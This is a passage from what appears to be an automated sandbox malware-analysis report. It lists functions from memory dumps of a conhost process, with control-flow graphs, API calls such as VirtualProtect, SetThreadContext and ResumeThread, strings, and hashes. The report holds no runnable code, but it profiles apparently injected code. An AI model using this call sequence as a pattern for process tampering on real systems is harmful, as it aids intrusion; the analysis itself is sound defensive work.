2505e5978b5-2505e5978ca call 2505e5975f0 486->489 487->486 495 2505e59787a-2505e59789c call 2505e593458 call 2505e597758 487->495 488->489 488->490 489->490 509 2505e5978cc-2505e5978d6 489->509 490->468 495->486 520 2505e59789e-2505e5978a6 call 2505e5a3358 495->520 517 2505e597701-2505e59770b call 2505e597d78 499->517 518 2505e597725-2505e597730 499->518 514 2505e5978d8-2505e5978df 509->514 515 2505e5978e1-2505e5978f1 call 2505e5a3358 509->515 514->490 515->490 517->518 527 2505e59770d-2505e59771b 517->527 518->451 520->486 527->518 528->479 529 2505e5976c7-2505e5976e4 call 2505e599c78 528->529 529->479
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                    • String ID:
                                                                                                    • API String ID: 190073905-0
                                                                                                    • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction ID: 77931e95ccbcf059cda7bcbb1bf8d6d8393bb13f5076452cb19ead3b77a936ce
                                                                                                    • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                                                                                    • Instruction Fuzzy Hash: B781A022704E49C6FA50AB759CCD3D96291BB45B87FC841E69AC4C7797FA38C841CF08
                                                                                                    Function 000002505E599804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 532 2505e599804-2505e599842 533 2505e599848-2505e59984b 532->533 534 2505e599933 532->534 535 2505e599935-2505e599951 533->535 536 2505e599851 533->536 534->535 537 2505e599854 536->537 538 2505e59992b 537->538 539 2505e59985a-2505e599869 537->539 538->534 540 2505e59986b-2505e59986e 539->540 541 2505e599876-2505e599895 LoadLibraryExW 539->541 542 2505e59990d-2505e59991c call 2505e5a3090 540->542 543 2505e599874 540->543 544 2505e5998ed-2505e599902 541->544 545 2505e599897-2505e5998a0 call 2505e5a3080 541->545 542->538 552 2505e59991e-2505e599929 542->552 546 2505e5998e1-2505e5998e8 543->546 544->542 548 2505e599904-2505e599907 FreeLibrary 544->548 553 2505e5998cf-2505e5998d9 545->553 554 2505e5998a2-2505e5998b7 call 2505e59ad28 545->554 546->537 548->542 552->535 553->546 554->553 557 2505e5998b9-2505e5998cd LoadLibraryExW 554->557 557->544 557->553
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                    • String ID: api-ms-
                                                                                                    • API String ID: 2559590344-2084034818
                                                                                                    • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction ID: 76bddfb9a447f01753fc307bb21d1204c014d295f60e6576bde33efb9e77d66b
                                                                                                    • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                                                                                    • Instruction Fuzzy Hash: E631A731212F50D1EE119B02ACC87D963A4F708BA6F990569EDAD87741FF38C445CB04
                                                                                                    Function 000002505E5A1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                    • String ID: CONOUT$
                                                                                                    • API String ID: 3230265001-3130406586
                                                                                                    • Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction ID: 5a87951288a97162f8a12c67fbdb641b5f6a86850d3693ab35dc9a85953687c8
                                                                                                    • Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
                                                                                                    • Instruction Fuzzy Hash: 41115B61214F5086E7509B56ECD8319A6A0F788BEBF844374EA9987B94EB78C9048B48
                                                                                                    Function 000002505E595C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 581 2505e595c10-2505e595c37 582 2505e595c39-2505e595c48 581->582 583 2505e595c4b-2505e595c56 GetCurrentThreadId 581->583 582->583 584 2505e595c58-2505e595c5d 583->584 585 2505e595c62-2505e595c69 583->585 586 2505e59608f-2505e5960a6 call 2505e597a20 584->586 587 2505e595c7b-2505e595c8f 585->587 588 2505e595c6b-2505e595c76 call 2505e595a40 585->588 590 2505e595c9e-2505e595ca4 587->590 588->586 593 2505e595caa-2505e595cb3 590->593 594 2505e595d75-2505e595d96 590->594 597 2505e595cfa-2505e595d6d call 2505e5945f0 call 2505e594590 call 2505e594550 593->597 598 2505e595cb5-2505e595cf8 call 2505e5986a0 593->598 599 2505e595d9c-2505e595dbc GetThreadContext 594->599 600 2505e595eff-2505e595f10 call 2505e59759f 594->600 611 2505e595d70 597->611 598->611 604 2505e595efa 599->604 605 2505e595dc2-2505e595de3 599->605 614 2505e595f15-2505e595f1b 600->614 604->600 605->604 615 2505e595de9-2505e595df2 605->615 611->590 617 2505e595fde-2505e595fee 614->617 618 2505e595f21-2505e595f78 VirtualProtect FlushInstructionCache 614->618 619 2505e595e72-2505e595e83 615->619 620 2505e595df4-2505e595e05 615->620 621 2505e595ffe-2505e59600a call 2505e594ed0 617->621 622 2505e595ff0-2505e595ff7 617->622 624 2505e595fa9-2505e595fd9 call 2505e59798c 618->624 625 2505e595f7a-2505e595f84 618->625 626 2505e595ef5 619->626 627 2505e595e85-2505e595ea3 619->627 628 2505e595e6d 620->628 629 2505e595e07-2505e595e1c 620->629 643 2505e59600f-2505e596015 621->643 622->621 630 2505e595ff9 call 2505e5944c0 622->630 624->614 625->624 632 2505e595f86-2505e595fa1 call 2505e594470 625->632 627->626 634 2505e595ea5-2505e595eec call 2505e5939e0 627->634 628->626 629->628 635 2505e595e1e-2505e595e68 call 2505e593a50 SetThreadContext 629->635 630->621 632->624 634->626 646 2505e595ef0 call 2505e5975bd 634->646 635->628 647 2505e596057-2505e596075 643->647 648 2505e596017-2505e596055 ResumeThread call 2505e59798c 643->648 646->626 650 2505e596089 647->650 651 2505e596077-2505e596086 647->651 648->643 650->586 651->650
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread$Current$Context
                                                                                                    • String ID:
                                                                                                    • API String ID: 1666949209-0
                                                                                                    • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction ID: e7b0326d7d622f23563650b2b79d375bf1f9d50c08da1ac521b57ade460357b3
                                                                                                    • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                                                                    • Instruction Fuzzy Hash: 33D1AE76208F88C2DA709B15E8D439A77A0F388B89F540256EACD87BA5DF3DC551CF14
                                                                                                    Function 000002505E5930B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                    • String ID: dialer
                                                                                                    • API String ID: 756756679-3528709123
                                                                                                    • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction ID: 0c139b90974bd49409bcc376287ce2d3485afe3144aa330ed99a948bf4698402
                                                                                                    • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                                                                    • Instruction Fuzzy Hash: 2B31A221701F51C2EB158F56ADC83A967A0FB44B86F884170DFC887B66FB38C4A1CB08
                                                                                                    Function 000002505E591A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 517849248-0
                                                                                                    • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                    • Instruction ID: c2c86ba0894afac8225ed328cbd66688ff4d6b62a51ea17d493ccefcc6543374
                                                                                                    • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                                                                    • Instruction Fuzzy Hash: 65015B21300F4196EA10DB12ACD835D63A1F788FC6F888175CE8A87B54EE38C985CB44
                                                                                                    Function 000002505E5937AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 449555515-0
                                                                                                    • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                    • Instruction ID: a62bcc4994c478b59c4898fe1ffe9ac0c3b4cd6dee26d105c4212ae722d4ee53
                                                                                                    • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                                                                    • Instruction Fuzzy Hash: B8111B65612F40C6EB249B21ECDD75A66A0BB49F87F8406B4CB8947B65FF3CC448CB08
                                                                                                    Function 000002505E5990F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 64f3afeaf52b1f802eab2e58b3703433e50d0af451ad10fd696eeb2ac45527d3
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: F4519132712A00CAEF14DB15ECCCB993795F344B9AF918160DA968778AFB35D841CF08
                                                                                                    Function 000002505E5990D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 2395640692-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: f28b821d02ddfd9dddc13a146462b830b973b160ddacb02e053f8ccbf02792d6
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: B131C032211B40D6EB14DF15ECCC79937A5F744B8AF858164EE8A87B86EB39C940CF08
                                                                                                    Function 000002505E591AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FinalHandleNamePathlstrlen
                                                                                                    • String ID: \\?\
                                                                                                    • API String ID: 2719912262-4282027825
                                                                                                    • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                    • Instruction ID: 6cd07cebd1b6af4c78a40fcf14d21910c525816d05a8db276b4f9a068e4656e0
                                                                                                    • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                                                                    • Instruction Fuzzy Hash: 68F04F22304A41D2EB608B21FDD839D6762F754B8AFC481B1CAC98B955FE7CC688CF04
                                                                                                    Function 000002505E593200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CombinePath
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3422762182-91387939
                                                                                                    • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                    • Instruction ID: a9cdc26376ed5a49371cb523a8ea8404f6216000fbebbf99cddfec1369992df0
                                                                                                    • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                    • Instruction Fuzzy Hash: BFF05410304F80D1EA004B13BDC82595651BB48FD6F845271DFD647F19EE38C4458B08
                                                                                                    Function 000002505E59A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                    • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction ID: d33ba17f7c202e294a495d83ad5e1bca6dc092f6459289417f1923e6c260a412
                                                                                                    • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                    • Instruction Fuzzy Hash: 74F08261711E4092EF495B60ECCC3692360FB48B87F882569D68B85562FF3CC488CF18
                                                                                                    Function 000002505E5951B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction ID: 5fef3eae2ee2d4daa462992a71742800898750accf5ccb6482496928d1606619
                                                                                                    • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                                                                    • Instruction Fuzzy Hash: 8D02C732219B80C6EBA08B55F8D439AB7A0F3C5785F504155EACE87BA9EB7CC494CF14
                                                                                                    Function 000002505E5A0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 2210144848-0
                                                                                                    • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                    • Instruction ID: 8d36156a80f32a8e7630829be21a77808ce2f2e688cadd1d49fab56b49a3b8ae
                                                                                                    • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                    • Instruction Fuzzy Hash: DA81A122620E1589FB509F659CD83AD67A1F744B8BFC443B6DE8A937D2FB348441CB18
                                                                                                    Function 000002505E5957F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2882836952-0
                                                                                                    • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                                    • Instruction ID: 7a02a7a9a30954f5a9f76d53ec68aea0e9089bdbd6db6d149bd5a823c3197ffd
                                                                                                    • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                                                                    • Instruction Fuzzy Hash: 4A61D872519E44C6E7609B15FCC835AB7A0F388746F900266EACD87BA9EB7CC550CF18
                                                                                                    Function 000002505E5712B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction ID: 9ce4fbaea3fa87a292180b421068fadc6c1a817d92d1686f69c896ce7e598546
                                                                                                    • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction Fuzzy Hash: BF117322A54F0101F6A41169EFDE3692151FB543F6FD846A4EEF706BD6AA388C61490C
                                                                                                    Function 000002505E5A1EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _set_statfp
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156100317-0
                                                                                                    • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction ID: ba42963b27bc9b241ce42ce2ae65babb75dae052af32885b9ad4ec7ffdb1ece7
                                                                                                    • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                                                                    • Instruction Fuzzy Hash: 2A11C6A6A54F8001FA981164EEDE36511407B64377FC807F4BBF6073D6BB348C81492C
                                                                                                    Function 000002505E593878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                    • String ID:
                                                                                                    • API String ID: 1092925422-0
                                                                                                    • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                    • Instruction ID: 597509de488902e0dd0cf98e051c724a16045d1c2c97cec4fbf42e6dc611dd65
                                                                                                    • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                    • Instruction Fuzzy Hash: 8A112A2A705F40C2EB149B11FC883AAA6A4F749B86F840179DFC947B95FE3DC505CB08
                                                                                                    Function 000002505E5684F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 3242871069-629598281
                                                                                                    • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction ID: 0783cfe523f346f34b551868f2375fbce282e966e711019548aacd285b2afed0
                                                                                                    • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                                                                    • Instruction Fuzzy Hash: 3051AE72612A408AEB14CF25ECC8B193395F364B9AFD581E4DA9647788FB74C881CF08
                                                                                                    Function 000002505E5684D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398224271.000002505E560000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002505E560000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e560000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                    • String ID: csm$f
                                                                                                    • API String ID: 3242871069-629598281
                                                                                                    • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction ID: 87c6182f40bd988b716c09583eb5e09b499adf5023caaa6e4dce12c4b00c6d23
                                                                                                    • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                                                                    • Instruction Fuzzy Hash: CC318D76211A4096E714DF11ECC871937A4F754BDAFD58094AEDA07785EB38C941CF0C
                                                                                                    Function 000002505E5914B4 Relevance: 6.3, APIs: 5, Instructions: 47memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$Process$Free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3168794593-0
                                                                                                    • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                                                    • Instruction ID: a9ea8ad55b1df28a82c511e380e7a5d9db68225ff9242854fbee235eaa4568ec
                                                                                                    • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                                                                    • Instruction Fuzzy Hash: EB116732514F98D2E750CF66ACC821EB7A0F789B8AF444269DB8A03B15EF38C011CB08
                                                                                                    Function 000002505E5926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction ID: 01c45d686f8aa54dfb1f84fa8c5fb40e7095e24cfa45e893376f61836752e0f7
                                                                                                    • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                    • Instruction Fuzzy Hash: 9771D236204F81C5EB249F65ADD83EA6790F745B86FC410A6DEC983B8AEE38C544CB44
                                                                                                    Function 000002505E5924DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000027.00000002.2398281336.000002505E590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002505E590000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_39_2_2505e590000_conhost.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileType
                                                                                                    • String ID: \\.\pipe\
                                                                                                    • API String ID: 3081899298-91387939
                                                                                                    • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                    • Instruction ID: e5258a68bd502a6a3f5f7e5d935fe415c89fa8dc7fa37deaa6c1d4fb276eedd4
                                                                                                    • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
